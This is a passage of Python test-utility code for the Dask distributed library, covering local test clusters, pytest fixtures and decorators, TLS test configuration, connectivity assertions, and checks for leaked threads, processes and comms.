# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
try:
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
except Exception as exc:
for i in range(nputs):
q.put(exc)
else:
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
pid = os.getpid()
try:
worker = await Worker(scheduler_addr, validate=True, **kwargs)
except Exception as exc:
q.put((pid, exc))
else:
q.put((pid, worker.address))
await worker.finished()
# Scheduler might've failed
if isinstance(scheduler_addr, str):
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
pid = os.getpid()
try:
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
except Exception as exc:
q.put((pid, exc))
else:
q.put((pid, worker.address))
await worker.finished()
# Scheduler might've failed
if isinstance(scheduler_addr, str):
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
# before calling close_rpc() after a CommClosedError.
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
# Compatibility. A lot of tests simply use `c` as fixture name
c = client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
def _terminate_join(proc):
proc.terminate()
proc.join()
proc.close()
def _close_queue(q):
q.close()
q.join_thread()
q._writer.close() # https://bugs.python.org/issue42752
class _SafeTemporaryDirectory(tempfile.TemporaryDirectory):
def __exit__(self, exc_type, exc_val, exc_tb):
try:
return super().__exit__(exc_type, exc_val, exc_tb)
except (PermissionError, NotADirectoryError):
# It appears that we either have a process still interacting with
# the tmpdirs of the workers or that win process are not releasing
# their lock in time. We are receiving PermissionErrors during
# teardown
# See also https://github.com/dask/distributed/pull/5825
pass
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
active_rpc_timeout=10,
disconnect_timeout=20,
scheduler_kwargs={},
config={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
with contextlib.ExitStack() as stack:
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
stack.callback(_close_queue, scheduler_q)
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1, config),
kwargs=scheduler_kwargs,
daemon=True,
)
ws.add(scheduler)
scheduler.start()
stack.callback(_terminate_join, scheduler)
# Launch workers
workers_by_pid = {}
q = mp_context.Queue()
stack.callback(_close_queue, q)
for _ in range(nworkers):
tmpdirname = stack.enter_context(
_SafeTemporaryDirectory(prefix="_dask_test_worker")
)
kwargs = merge(
{
"nthreads": 1,
"local_directory": tmpdirname,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q, config),
kwargs=kwargs,
)
ws.add(proc)
proc.start()
stack.callback(_terminate_join, proc)
workers_by_pid[proc.pid] = {"proc": proc}
saddr_or_exception = scheduler_q.get()
if isinstance(saddr_or_exception, Exception):
raise saddr_or_exception
saddr = saddr_or_exception
for _ in range(nworkers):
pid, addr_or_exception = q.get()
if isinstance(addr_or_exception, Exception):
raise addr_or_exception
workers_by_pid[pid]["address"] = addr_or_exception
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {
"connection_args": security.get_connection_args("client")
}
except KeyError:
rpc_kwargs = {}
async def wait_for_workers():
async with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = await s.ncores()
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
loop.run_sync(wait_for_workers)
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers_by_pid.values()
]
finally:
logger.debug("Closing out test cluster")
alive_workers = [
w["address"]
for w in workers_by_pid.values()
if w["proc"].is_alive()
]
loop.run_sync(
lambda: disconnect_all(
alive_workers,
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
if scheduler.is_alive():
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with rpc(addr, **rpc_kwargs) as w:
# If the worker was killed hard (e.g. sigterm) during test runtime,
# we do not know at this point and may not be able to connect
with suppress(EnvironmentError, CommClosedError):
# Do not request a reply since comms will be closed by the
# worker before a reply can be made and we will always trigger
# the timeout
await w.terminate(reply=False)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*(disconnect(addr, timeout, rpc_kwargs) for addr in addresses))
def gen_test(timeout: float = _TEST_TIMEOUT) -> Callable[[Callable], Callable]:
"""Coroutine test
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_test(timeout=5)
    async def test_foo(param):
await ... # use tornado coroutines
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
assert timeout, (
"timeout should always be set and it should be smaller than the global one from"
"pytest-timeout"
)
def _(func):
def test_func(*args, **kwargs):
with clean() as loop:
injected_func = functools.partial(func, *args, **kwargs)
if iscoroutinefunction(func):
cor = injected_func
else:
cor = gen.coroutine(injected_func)
loop.run_sync(cor, timeout=timeout)
# Patch the signature so pytest can inject fixtures
test_func.__signature__ = inspect.signature(func)
return test_func
return _
async def start_cluster(
nthreads: list[tuple[str, int] | tuple[str, int, dict]],
scheduler_addr: str,
loop: IOLoop,
security: Security | dict[str, Any] | None = None,
Worker: type[ServerNode] = Worker,
scheduler_kwargs: dict[str, Any] = {},
worker_kwargs: dict[str, Any] = {},
) -> tuple[Scheduler, list[ServerNode]]:
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(
merge(worker_kwargs, ncore[2]) # type: ignore
if len(ncore) > 2
else worker_kwargs
),
)
for i, ncore in enumerate(nthreads)
]
await asyncio.gather(*workers)
start = time()
while (
len(s.workers) < len(nthreads)
or any(ws.status != Status.running for ws in s.workers.values())
or any(comm.comm is None for comm in s.stream_comms.values())
):
await asyncio.sleep(0.01)
if time() > start + 30:
await asyncio.gather(*(w.close(timeout=1) for w in workers))
await s.close(fast=True)
raise TimeoutError("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*(end_worker(w) for w in workers))
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads: list[tuple[str, int] | tuple[str, int, dict]] = [
("127.0.0.1", 1),
("127.0.0.1", 2),
],
scheduler="127.0.0.1",
timeout: float = _TEST_TIMEOUT,
security: Security | dict[str, Any] | None = None,
Worker: type[ServerNode] = Worker,
client: bool = False,
scheduler_kwargs: dict[str, Any] = {},
worker_kwargs: dict[str, Any] = {},
client_kwargs: dict[str, Any] = {},
active_rpc_timeout: float = 1,
config: dict[str, Any] = {},
clean_kwargs: dict[str, Any] = {},
allow_unclosed: bool = False,
cluster_dump_directory: str | Literal[False] = "test_cluster_dump",
) -> Callable[[Callable], Callable]:
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
async def test_foo(scheduler, worker1, worker2):
await ... # use tornado coroutines
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, param):
await ... # use tornado coroutines
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, pytest_fixture_a, pytest_fixture_b):
await ... # use tornado coroutines
See also:
start
end
"""
assert timeout, (
"timeout should always be set and it should be smaller than the global one from"
"pytest-timeout"
)
scheduler_kwargs = merge(
{"dashboard": False, "dashboard_address": ":0"}, scheduler_kwargs
)
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 15}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
raise RuntimeError("gen_cluster only works for coroutine functions.")
@functools.wraps(func)
def test_func(*outer_args, **kwargs):
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for _ in range(60):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster: "
f"{e.__class__.__name__}: {e}; retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
coro = func(*args, *outer_args, **kwargs)
task = asyncio.create_task(coro)
coro2 = asyncio.wait_for(asyncio.shield(task), timeout)
result = await coro2
if s.validate:
s.validate_state()
except asyncio.TimeoutError:
assert task
buffer = io.StringIO()
# This stack indicates where the coro/test is suspended
task.print_stack(file=buffer)
if cluster_dump_directory:
await dump_cluster_state(
s,
ws,
output_dir=cluster_dump_directory,
func_name=func.__name__,
)
task.cancel()
while not task.cancelled():
await asyncio.sleep(0.01)
# Remove as much of the traceback as possible; it's
# uninteresting boilerplate from utils_test and asyncio and
# not from the code being tested.
raise TimeoutError(
f"Test timeout after {timeout}s.\n"
"========== Test stack trace starts here ==========\n"
f"{buffer.getvalue()}"
) from None
except pytest.xfail.Exception:
raise
except Exception:
if cluster_dump_directory and not has_pytestmark(
test_func, "xfail"
):
await dump_cluster_state(
s,
ws,
output_dir=cluster_dump_directory,
func_name=func.__name__,
)
raise
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == Status.closed)
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 60:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except OSError:
# zict backends can fail if their storage directory
# was already removed
pass
return result
# Patch the signature so pytest can inject fixtures
orig_sig = inspect.signature(func)
args = [None] * (1 + len(nthreads)) # scheduler, *workers
if client:
args.insert(0, None)
bound = orig_sig.bind_partial(*args)
test_func.__signature__ = orig_sig.replace(
parameters=[
p
for name, p in orig_sig.parameters.items()
if name not in bound.arguments
]
)
return test_func
return _
async def dump_cluster_state(
s: Scheduler, ws: list[ServerNode], output_dir: str, func_name: str
) -> None:
"""A variant of Client.dump_cluster_state, which does not rely on any of the below
to work:
- Having a client at all
- Client->Scheduler comms
- Scheduler->Worker comms (unless using Nannies)
"""
scheduler_info = s._to_dict()
workers_info: dict[str, Any]
versions_info = version_module.get_versions()
if not ws or isinstance(ws[0], Worker):
workers_info = {w.address: w._to_dict() for w in ws}
else:
workers_info = await s.broadcast(msg={"op": "dump_state"}, on_error="return")
workers_info = {
k: repr(v) if isinstance(v, Exception) else v
for k, v in workers_info.items()
}
state = {
"scheduler": scheduler_info,
"workers": workers_info,
"versions": versions_info,
}
os.makedirs(output_dir, exist_ok=True)
fname = os.path.join(output_dir, func_name) + ".yaml"
with open(fname, "w") as fh:
yaml.safe_dump(state, fh) # Automatically convert tuples to lists
print(f"Dumped cluster state to {fname}")
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def _terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(30)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args: list[str], flush_output: bool = True, **kwargs):
"""Start a shell command in a subprocess.
Yields a subprocess.Popen object.
stderr is redirected to stdout.
stdout is redirected to a pipe.
Parameters
----------
args: list[str]
Command line arguments
flush_output: bool, optional
If True (the default), the stdout/stderr pipe is emptied while it is being
filled. Set to False if you wish to read the output yourself. Note that setting
this to False and then failing to periodically read from the pipe may result in
a deadlock due to the pipe getting full.
kwargs: optional
optional arguments to subprocess.Popen
"""
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.STDOUT
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
if flush_output:
ex = concurrent.futures.ThreadPoolExecutor(1)
flush_future = ex.submit(proc.communicate)
try:
yield proc
# asyncio.CancelledError is raised by @gen_test/@gen_cluster timeout
except (Exception, asyncio.CancelledError):
dump_stdout = True
raise
finally:
try:
_terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
if flush_output:
out, err = flush_future.result()
ex.shutdown()
else:
out, err = proc.communicate()
assert not err
if dump_stdout:
print("\n" + "-" * 27 + " Subprocess stdout/stderr" + "-" * 27)
print(out.decode().rstrip())
print("-" * 80)
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
if os.getenv("DISABLE_IPV6") == "1":
return False
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
return True
except OSError:
return False
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger."""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
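# Illustrative usage of captured_logger() (a sketch):
#   with captured_logger("distributed.scheduler") as sio:
#       ...  # code expected to log via the distributed.scheduler logger
#   assert "expected message" in sio.getvalue()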
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler."""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from distributed.config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip(f"rlimit too low ({soft}) and can't be increased: {e}")
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
    old_modules = dict(sys.modules)
    old_path = list(sys.path)
    try:
        yield
    finally:
        # iterate over snapshots so entries can be removed safely while iterating
        for i, elem in reversed(list(enumerate(sys.path))):
            if elem not in old_path:
                del sys.path[i]
        for elem in list(sys.modules):
            if elem not in old_modules:
                del sys.modules[elem]
@contextmanager
def check_thread_leak():
"""Context manager to ensure we haven't leaked any threads"""
# "TCP-Executor" threads are never stopped once they are started
BaseTCPConnector.warmup()
active_threads_start = threading.enumerate()
yield
start = time()
while True:
bad_threads = [
thread
for thread in threading.enumerate()
if thread not in active_threads_start
# FIXME this looks like a genuine leak that needs fixing
and "watch message queue" not in thread.name
]
if not bad_threads:
break
else:
sleep(0.01)
if time() > start + 5:
# Raise an error with information about leaked threads
from distributed import profile
bad_thread = bad_threads[0]
call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident])
assert False, (bad_thread, call_stacks)
def wait_active_children(timeout: float) -> list[multiprocessing.Process]:
"""Wait until timeout for mp_context.active_children() to terminate.
Return list of active subprocesses after the timeout expired.
"""
t0 = time()
while True:
# Do not sample the subprocesses once at the beginning with
# `for proc in mp_context.active_children: ...`, assume instead that new
# children processes may be spawned before the timeout expires.
children = mp_context.active_children()
if not children:
return []
join_timeout = timeout - time() + t0
if join_timeout <= 0:
return children
children[0].join(timeout=join_timeout)
def term_or_kill_active_children(timeout: float) -> None:
"""Send SIGTERM to mp_context.active_children(), wait up to 3 seconds for processes
to die, then send SIGKILL to the survivors
"""
children = mp_context.active_children()
for proc in children:
proc.terminate()
children = wait_active_children(timeout=timeout)
for proc in children:
proc.kill()
children = wait_active_children(timeout=30)
if children: # pragma: nocover
logger.warning("Leaked unkillable children processes: %s", children)
# It should be impossible to ignore SIGKILL on Linux/MacOSX
assert WINDOWS
@contextmanager
def check_process_leak(
check: bool = True, check_timeout: float = 40, term_timeout: float = 3
):
"""Terminate any currently-running subprocesses at both the beginning and end of this context
Parameters
----------
check : bool, optional
If True, raise AssertionError if any processes survive at the exit
check_timeout: float, optional
Wait up to these many seconds for subprocesses to terminate before failing
term_timeout: float, optional
After sending SIGTERM to a subprocess, wait up to these many seconds before
sending SIGKILL
"""
term_or_kill_active_children(timeout=term_timeout)
try:
yield
if check:
children = wait_active_children(timeout=check_timeout)
assert not children, f"Test leaked subprocesses: {children}"
finally:
term_or_kill_active_children(timeout=term_timeout)
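# Illustrative usage of check_process_leak() (a sketch; the test body is hypothetical):
#   with check_process_leak(check=True):
#       run_test_that_spawns_subprocesses()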
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
Worker._initialized_clients.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status in Status.ANY_RUNNING:
w.loop.add_callback(w.close)
Worker._instances.clear()
start = time()
while any(c.status != "closed" for c in Worker._initialized_clients):
sleep(0.1)
assert time() < start + 10
Worker._initialized_clients.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
raise ValueError("Unclosed Comms", L)
assert all(
n.status == Status.closed or n.status == Status.init for n in Nanny._instances
), {n: n.status for n in Nanny._instances}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == Status.closed for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
with check_thread_leak() if threads else nullcontext():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else nullcontext():
with check_active_rpc(loop, timeout):
reset_config()
with dask.config.set(
{
"distributed.comm.timeouts.connect": "5s",
"distributed.admin.tick.interval": "500 ms",
}
):
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
@pytest.fixture
def cleanup():
with clean():
yield
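# A minimal usage sketch (not part of the original module): a test can either
# request the ``cleanup`` fixture or wrap its body in ``clean()`` directly.
# The test names below are hypothetical placeholders.
#
#     def test_with_fixture(cleanup):
#         ...  # test body runs with thread/process/instance checks around it
#
#     def test_with_context_manager():
#         with clean(threads=True, instances=True):
#             ...  # same checks, applied explicitly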
class TaskStateMetadataPlugin(WorkerPlugin):
"""WorkPlugin to populate TaskState.metadata"""
def setup(self, worker):
self.worker = worker
def transition(self, key, start, finish, **kwargs):
ts = self.worker.tasks[key]
if start == "ready" and finish == "executing":
ts.metadata["start_time"] = time()
elif start == "executing" and finish == "memory":
ts.metadata["stop_time"] = time()
class LockedComm(TCP):
def __init__(self, comm, read_event, read_queue, write_event, write_queue):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.comm = comm
assert isinstance(comm, TCP)
def __getattr__(self, name):
return getattr(self.comm, name)
async def write(self, msg, serializers=None, on_error="message"):
if self.write_queue:
await self.write_queue.put((self.comm.peer_address, msg))
if self.write_event:
await self.write_event.wait()
return await self.comm.write(msg, serializers=serializers, on_error=on_error)
async def read(self, deserializers=None):
msg = await self.comm.read(deserializers=deserializers)
if self.read_queue:
await self.read_queue.put((self.comm.peer_address, msg))
if self.read_event:
await self.read_event.wait()
return msg
async def close(self):
await self.comm.close()
class _LockedCommPool(ConnectionPool):
"""A ConnectionPool wrapper to intercept network traffic between servers
This wrapper can be attached to a running server to intercept outgoing read or write requests in test environments.
Examples
--------
>>> w = await Worker(...)
>>> read_event = asyncio.Event()
